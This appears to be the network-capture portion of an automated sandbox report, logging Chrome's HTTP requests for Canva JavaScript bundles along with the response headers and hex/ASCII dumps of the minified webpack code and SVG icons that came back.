                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 20 31 38 2e 37 38 61 2e 35 2e 35 20 30 20 30 20 30 20 2e 34 35 2e 37 32 68 31 33 2e 37 32 61 2e 35 2e 35 20 30 20 30 20 30 20 2e 34 35 2d 2e 37 32 4c 31 32 2e 34 35 20 34 2e 38 31 7a 4d 31 32 20 31 38 2e 32 35 61 31 2e 32 35 20 31 2e 32 35 20 30 20 31 20 31 20 30 2d 32 2e 35 20 31 2e 32 35 20 31 2e 32 35 20 30 20 30 20 31 20 30 20 32 2e 35 7a 4d 31 32 20 39 61 31 20 31 20 30 20 30 20 31 20 31 20 31 76 33 2e 35 61 31 20 31 20 30 20 30 20 31 2d 32 20 30 56 31 30 61 31 20 31 20 30 20 30 20 31 20 31 2d 31 7a 22 2f 3e 3c 2f 73 76 67 3e 27 3b 76 61 72 20 53 71 61 3d 27 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69
                                                                                                                                                                                                                                                                    Data Ascii: 18.78a.5.5 0 0 0 .45.72h13.72a.5.5 0 0 0 .45-.72L12.45 4.81zM12 18.25a1.25 1.25 0 1 1 0-2.5 1.25 1.25 0 0 1 0 2.5zM12 9a1 1 0 0 1 1 1v3.5a1 1 0 0 1-2 0V10a1 1 0 0 1 1-1z"/></svg>';var Sqa='<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" vi


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    55192.168.2.1249780104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC615OUTGET /web/f5352d9ab53b693f.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:41 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 2229
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951141982728c-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49981
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "b852c7982f102b1fa252fc1a2e5f1356"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:27 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:24 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: iqJzqyPv7nFhymDlIWm4G6mpPTc0aaTycrI4GeaxScDtkmeT1PHfzorsFgF5LsZgfr4ejgoY9j0=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8X0KQHMSY06M04
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: bgiMqc3rmR1SxA47lEXlkIBhOoRP4Jtx
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC348INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 43 59 58 65 69 49 34 47 30 48 31 63 76 4a 74 50 62 76 25 32 46 53 64 66 75 77 6c 57 49 48 50 59 38 6b 32 25 32 46 78 57 4a 31 67 65 48 74 4c 5a 33 79 76 32 62 70 66 4e 75 41 56 4c 79 58 6e 68 42 48 33 4e 76 4a 6b 58 34 77 30 6b 4e 76 61 72 44 66 53 63 49 6d 6e 36 44 4d 63 51 74 69 56 62 65 6b 68 6e 73 51 57 31 78 32 6b 34 79 6d 4d 65 4e 6a 6a 76 34 78 59 62 31 4c 55 45 37 55 50 65 61 46 76 55 66 35 41 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CYXeiI4G0H1cvJtPbv%2FSdfuwlWIHPY8k2%2FxWJ1geHtLZ3yv2bpfNuAVLyXnhBH3NvJkX4w0kNvarDfScImn6DMcQtiVbekhnsQW1x2k4ymMeNjjv4xYb1LUE7UPeaFvUf5A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1201INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 30 34 35 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 37 37 34 32 35 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[7045],{/***/ 277425:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._4
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1028INData Raw: 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 72 65 63 74 20 78 3d 22 37 22 20 79 3d 22 35 22 20 77 69 64 74 68 3d 22 33 22 20 68 65 69 67 68 74 3d 22 31 34 22 20 72 78 3d 22 31 2e 35 22 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 34 22 20 79 3d 22 35 22 20 77 69 64 74 68 3d 22 33 22 20 68 65 69 67 68 74 3d 22 31 34 22 20 72 78 3d 22 31 2e 35 22 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2f 3e 3c 2f 73 76 67 3e 27 3b 5f 5f 63 2e 70 50 61 3d 27 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 76
                                                                                                                                                                                                                                                                    Data Ascii: rg/2000/svg" width="24" height="24" viewBox="0 0 24 24"><rect x="7" y="5" width="3" height="14" rx="1.5" fill="currentColor"/><rect x="14" y="5" width="3" height="14" rx="1.5" fill="currentColor"/></svg>';__c.pPa='<svg width="24" height="24" fill="none" v


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    56192.168.2.1249781104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC932OUTGET /chunk-batch/40ceb5685514c3ac.js+29a6013e2c182f97.js+a191003715351325.js+005f43e2061f01f1.js+9107e36b81496080.js+e42c36f16cc6f532.js+dad3364637d681fb.strings.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1149INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:41 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 956250
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951144c1c43a1-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49980
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:27 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:16 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 61jPqH+S69ztxmv793ONM6JkJBMA4+VqEIcdDfD0jjf0t1olymYWTxoxezyw3AvAMWjGAz1jK7c=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8HM9QRTQC62QD3
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 8Ge9w96OJbPwlgKKmOWsIZ4zbDyrLs8_
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC362INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 61 72 75 38 34 41 78 31 7a 38 4d 34 51 25 32 46 53 7a 47 50 36 39 74 33 6c 33 6f 52 69 38 50 4b 59 55 78 30 59 67 25 32 46 51 45 61 53 51 69 72 78 50 7a 64 37 4f 4c 77 48 43 43 77 41 67 50 65 41 74 35 70 4d 74 52 4b 4a 74 61 57 31 39 67 75 4a 74 58 58 75 76 52 63 68 51 79 74 56 31 6f 64 4f 49 36 67 4e 35 78 70 65 5a 64 44 53 36 51 68 30 43 53 69 64 77 52 71 44 56 61 50 6c 54 79 65 6e 6c 7a 62 48 49 4f 6f 6b 25 32 46 33 48 73 46 67 33 42 56 30 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aru84Ax1z8M4Q%2FSzGP69t3l3oRi8PKYUx0Yg%2FQEaSQirxPzd7OLwHCCwAgPeAt5pMtRKJtaW19guJtXXuvRchQytV1odOI6gN5xpeZdDS6Qh0CSidwRqDVaPlTyenlzbHIOok%2F3HsFg3BV0%3D"}],"group":"cf-nel","max
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1227INData Raw: 3b 2f 2f 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 34 30 63 65 62 35 36 38 35 35 31 34 63 33 61 63 2e 6a 73 0a 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 30 38 30 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 39 31 33 37 32 38 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f
                                                                                                                                                                                                                                                                    Data Ascii: ;// __FILE_CONTENT_FOR__:40ceb5685514c3ac.js(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5080],{/***/ 913728:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 76 61 72 20 4b 3d 5f 5f 63 2e 4b 3b 76 61 72 20 62 64 3d 5f 5f 63 2e 62 64 3b 76 61 72 20 68 64 3d 5f 5f 63 2e 68 64 3b 76 61 72 20 50 61 3d 5f 5f 63 2e 50 61 3b 76 61 72 20 5a 63 3d 5f 5f 63 2e 5a 63 3b 76 61 72 20 57 3d 5f 5f 63 2e 57 3b 76 61 72 20 66 43 3d 5f 5f 63 2e 66 43 3b 76 61 72 20 67 43 3d 5f 5f 63 2e 67 43 3b 76 61 72 20 6f 75 3d 5f 5f 63 2e 6f 75 3b 76 61 72 20 6c 56 3b 76 61 72 20 66 61 3d 5f 5f 63 2e 66 61 3b 76 61 72 20 51 3d 5f 5f 63 2e 51 3b 76 61 72 20 54 3d 5f 5f 63 2e 54 3b 76 61 72 20 44 3d 5f 5f 63 2e 44 3b 76 61 72 20 4c 3d 5f 5f 63 2e 4c 3b 76 61 72 20 4d 3d 5f 5f 63 2e 4d 3b 76 61 72 20 24 77 3d 5f 5f 63 2e 24 77 3b 76 61 72 20 53 74 3d 5f 5f 63 2e 53 74 3b 76 61 72 20 4b 7a 3d 5f 5f 63 2e 4b 7a 3b 76 61 72 20 4c 7a 3d 5f 5f 63
                                                                                                                                                                                                                                                                    Data Ascii: var K=__c.K;var bd=__c.bd;var hd=__c.hd;var Pa=__c.Pa;var Zc=__c.Zc;var W=__c.W;var fC=__c.fC;var gC=__c.gC;var ou=__c.ou;var lV;var fa=__c.fa;var Q=__c.Q;var T=__c.T;var D=__c.D;var L=__c.L;var M=__c.M;var $w=__c.$w;var St=__c.St;var Kz=__c.Kz;var Lz=__c
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 20 69 76 3d 5f 5f 63 2e 69 76 3b 76 61 72 20 78 42 3d 5f 5f 63 2e 78 42 3b 76 61 72 20 53 78 3d 5f 5f 63 2e 53 78 3b 76 61 72 20 4c 4d 3b 76 61 72 20 59 3b 76 61 72 20 44 4d 3b 76 61 72 20 79 6e 3d 5f 5f 63 2e 79 6e 3b 76 61 72 20 78 4d 3b 76 61 72 20 77 4d 3b 76 61 72 20 61 65 3d 5f 5f 63 2e 61 65 3b 76 61 72 20 6a 77 3d 5f 5f 63 2e 6a 77 3b 76 61 72 20 4f 3d 5f 5f 63 2e 4f 3b 76 61 72 20 58 3b 76 61 72 20 4a 46 3d 5f 5f 63 2e 4a 46 3b 76 61 72 20 46 61 3d 5f 5f 63 2e 46 61 3b 76 61 72 20 4c 4c 3b 76 61 72 20 53 68 3d 5f 5f 63 2e 53 68 3b 76 61 72 20 73 49 3d 5f 5f 63 2e 73 49 3b 76 61 72 20 6d 49 3d 5f 5f 63 2e 6d 49 3b 76 61 72 20 67 49 3d 5f 5f 63 2e 67 49 3b 76 61 72 20 4e 48 3d 5f 5f 63 2e 4e 48 3b 76 61 72 20 55 4a 3d 5f 5f 63 2e 55 4a 3b 76 61 72
                                                                                                                                                                                                                                                                    Data Ascii: iv=__c.iv;var xB=__c.xB;var Sx=__c.Sx;var LM;var Y;var DM;var yn=__c.yn;var xM;var wM;var ae=__c.ae;var jw=__c.jw;var O=__c.O;var X;var JF=__c.JF;var Fa=__c.Fa;var LL;var Sh=__c.Sh;var sI=__c.sI;var mI=__c.mI;var gI=__c.gI;var NH=__c.NH;var UJ=__c.UJ;var
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 24 61 2c 42 24 61 2c 43 4c 2c 45 24 61 2c 46 24 61 2c 47 24 61 2c 49 24 61 2c 4a 24 61 2c 4b 24 61 2c 44 4c 2c 45 4c 2c 47 4c 2c 4e 24 61 2c 4f 24 61 2c 50 24 61 2c 51 24 61 2c 48 4c 2c 53 24 61 2c 54 24 61 2c 55 24 61 2c 57 24 61 2c 59 24 61 2c 56 24 61 2c 0a 4b 4c 2c 58 24 61 2c 5a 24 61 2c 63 61 62 2c 61 61 62 2c 65 61 62 2c 6b 61 62 2c 6c 61 62 2c 6a 61 62 2c 67 61 62 2c 6d 61 62 2c 66 61 62 2c 68 61 62 2c 69 61 62 2c 7a 61 62 2c 41 61 62 2c 44 61 62 2c 58 4c 2c 46 61 62 2c 59 4c 2c 5a 4c 2c 47 61 62 2c 48 61 62 2c 49 61 62 2c 4a 61 62 2c 24 4c 2c 4b 61 62 2c 62 4d 2c 63 4d 2c 4c 61 62 2c 4d 61 62 2c 4f 61 62 2c 50 61 62 2c 52 61 62 2c 51 61 62 2c 53 61 62 2c 54 61 62 2c 56 61 62 2c 59 61 62 2c 65 4d 2c 62 62 62 2c 6a 62 62 2c 64 62 62 2c 65 62 62 2c
                                                                                                                                                                                                                                                                    Data Ascii: $a,B$a,CL,E$a,F$a,G$a,I$a,J$a,K$a,DL,EL,GL,N$a,O$a,P$a,Q$a,HL,S$a,T$a,U$a,W$a,Y$a,V$a,KL,X$a,Z$a,cab,aab,eab,kab,lab,jab,gab,mab,fab,hab,iab,zab,Aab,Dab,XL,Fab,YL,ZL,Gab,Hab,Iab,Jab,$L,Kab,bM,cM,Lab,Mab,Oab,Pab,Rab,Qab,Sab,Tab,Vab,Yab,eM,bbb,jbb,dbb,ebb,
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 48 68 62 2c 56 68 62 2c 52 68 62 2c 4d 68 62 2c 6a 50 2c 6e 50 2c 57 68 62 2c 4e 68 62 2c 54 68 62 2c 58 68 62 2c 5a 68 62 2c 61 69 62 2c 6f 50 2c 5a 4d 2c 63 69 62 2c 64 69 62 2c 62 69 62 2c 6f 69 62 2c 6b 69 62 2c 72 69 62 2c 71 69 62 2c 70 69 62 2c 73 69 62 2c 74 69 62 2c 75 69 62 2c 77 69 62 2c 78 69 62 2c 79 69 62 2c 70 50 2c 42 69 62 2c 43 69 62 2c 45 69 62 2c 7a 69 62 2c 46 69 62 2c 47 69 62 2c 41 69 62 2c 4d 69 62 2c 4f 69 62 2c 71 50 2c 51 69 62 2c 4e 69 62 2c 52 69 62 2c 53 69 62 2c 55 69 62 2c 56 69 62 2c 57 69 62 2c 5a 69 62 2c 63 6a 62 2c 65 6a 62 2c 24 69 62 2c 61 6a 62 2c 62 6a 62 2c 64 6a 62 2c 69 6a 62 2c 6a 6a 62 2c 6e 6a 62 2c 70 6a 62 2c 72 6a 62 2c 75 50 2c 0a 76 6a 62 2c 75 6a 62 2c 77 6a 62 2c 78 6a 62 2c 79 6a 62 2c 7a 6a 62 2c 41
                                                                                                                                                                                                                                                                    Data Ascii: Hhb,Vhb,Rhb,Mhb,jP,nP,Whb,Nhb,Thb,Xhb,Zhb,aib,oP,ZM,cib,dib,bib,oib,kib,rib,qib,pib,sib,tib,uib,wib,xib,yib,pP,Bib,Cib,Eib,zib,Fib,Gib,Aib,Mib,Oib,qP,Qib,Nib,Rib,Sib,Uib,Vib,Wib,Zib,cjb,ejb,$ib,ajb,bjb,djb,ijb,jjb,njb,pjb,rjb,uP,vjb,ujb,wjb,xjb,yjb,zjb,A
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 70 62 2c 67 70 62 2c 69 70 62 2c 68 70 62 2c 6a 70 62 2c 6b 70 62 2c 6d 70 62 2c 6c 70 62 2c 6e 70 62 2c 72 70 62 2c 73 70 62 2c 76 70 62 2c 78 70 62 2c 79 70 62 2c 7a 70 62 2c 41 70 62 2c 42 70 62 2c 44 70 62 2c 47 70 62 2c 49 70 62 2c 48 70 62 2c 4e 70 62 2c 51 70 62 2c 52 70 62 2c 4f 70 62 2c 50 70 62 2c 54 70 62 2c 55 70 62 2c 59 70 62 2c 66 53 2c 5a 70 62 2c 61 71 62 2c 62 71 62 2c 63 71 62 2c 64 71 62 2c 65 71 62 2c 6a 71 62 2c 68 71 62 2c 66 71 62 2c 67 71 62 2c 69 71 62 2c 6b 71 62 2c 69 53 2c 6d 71 62 2c 6c 71 62 2c 6b 53 2c 6c 53 2c 6d 53 2c 6f 71 62 2c 71 71 62 2c 72 71 62 2c 6e 53 2c 73 71 62 2c 74 71 62 2c 75 71 62 2c 76 71 62 2c 77 71 62 2c 78 71 62 2c 79 71 62 2c 70 53 2c 7a 71 62 2c 41 71 62 2c 44 71 62 2c 42 71 62 2c 43 71 62 2c 59 71 62
                                                                                                                                                                                                                                                                    Data Ascii: pb,gpb,ipb,hpb,jpb,kpb,mpb,lpb,npb,rpb,spb,vpb,xpb,ypb,zpb,Apb,Bpb,Dpb,Gpb,Ipb,Hpb,Npb,Qpb,Rpb,Opb,Ppb,Tpb,Upb,Ypb,fS,Zpb,aqb,bqb,cqb,dqb,eqb,jqb,hqb,fqb,gqb,iqb,kqb,iS,mqb,lqb,kS,lS,mS,oqb,qqb,rqb,nS,sqb,tqb,uqb,vqb,wqb,xqb,yqb,pS,zqb,Aqb,Dqb,Bqb,Cqb,Yqb
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 2c 65 78 62 2c 78 78 62 2c 0a 45 78 62 2c 50 78 62 2c 52 78 62 2c 56 78 62 2c 57 78 62 2c 62 79 62 2c 64 79 62 2c 63 79 62 2c 66 79 62 2c 67 79 62 2c 68 79 62 2c 69 79 62 2c 6a 79 62 2c 6b 79 62 2c 6d 79 62 2c 6f 79 62 2c 70 79 62 2c 71 79 62 2c 72 79 62 2c 75 79 62 2c 74 79 62 2c 77 79 62 2c 42 79 62 2c 78 79 62 2c 44 79 62 2c 43 79 62 2c 46 79 62 2c 45 79 62 2c 47 79 62 2c 48 79 62 2c 49 79 62 2c 4a 79 62 2c 71 7a 62 2c 72 7a 62 2c 74 7a 62 2c 75 7a 62 2c 73 7a 62 2c 77 7a 62 2c 78 7a 62 2c 76 7a 62 2c 79 7a 62 2c 49 7a 62 2c 4a 7a 62 2c 4c 7a 62 2c 4b 7a 62 2c 76 73 62 2c 4d 7a 62 2c 4e 7a 62 2c 68 56 2c 50 7a 62 2c 52 7a 62 2c 53 7a 62 2c 64 74 62 2c 55 7a 62 2c 57 7a 62 2c 58 7a 62 2c 5a 7a 62 2c 24 7a 62 2c 61 41 62 2c 62 41 62 2c 63 41 62 2c 66 41
                                                                                                                                                                                                                                                                    Data Ascii: ,exb,xxb,Exb,Pxb,Rxb,Vxb,Wxb,byb,dyb,cyb,fyb,gyb,hyb,iyb,jyb,kyb,myb,oyb,pyb,qyb,ryb,uyb,tyb,wyb,Byb,xyb,Dyb,Cyb,Fyb,Eyb,Gyb,Hyb,Iyb,Jyb,qzb,rzb,tzb,uzb,szb,wzb,xzb,vzb,yzb,Izb,Jzb,Lzb,Kzb,vsb,Mzb,Nzb,hV,Pzb,Rzb,Szb,dtb,Uzb,Wzb,Xzb,Zzb,$zb,aAb,bAb,cAb,fA
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 67 2e 65 6e 64 28 29 29 7d 3b 7a 38 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 63 6f 6e 73 74 20 65 3d 61 2e 75 48 28 63 29 3b 5b 2e 2e 2e 61 2e 48 53 5d 2e 66 69 6c 74 65 72 28 65 29 2e 66 6f 72 45 61 63 68 28 66 3d 3e 62 5b 66 5d 2e 61 64 64 28 64 5b 66 5d 29 29 3b 45 70 28 61 2c 64 2c 66 3d 3e 61 2e 51 65 61 28 66 29 26 26 65 28 66 29 2c 28 66 2c 67 29 3d 3e 62 5b 67 5d 2e 61 64 64 28 66 29 29 7d 3b 0a 41 38 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 63 6f 6e 73 74 20 65 3d 61 2e 75 68 2c 66 3d 61 2e 75 48 28 63 29 3b 76 61 72 20 67 3b 5b 2e 2e 2e 61 2e 48 53 5d 2e 66 69 6c 74 65 72 28 66 29 2e 66 6f 72 45 61 63 68 28 68 3d 3e 62 5b 68 5d 2e 61 64 64 28 6e 75 6c 6c 21 3d 3d 28 67 3d 64 5b 68 5d 29 26 26 76 6f 69 64 20
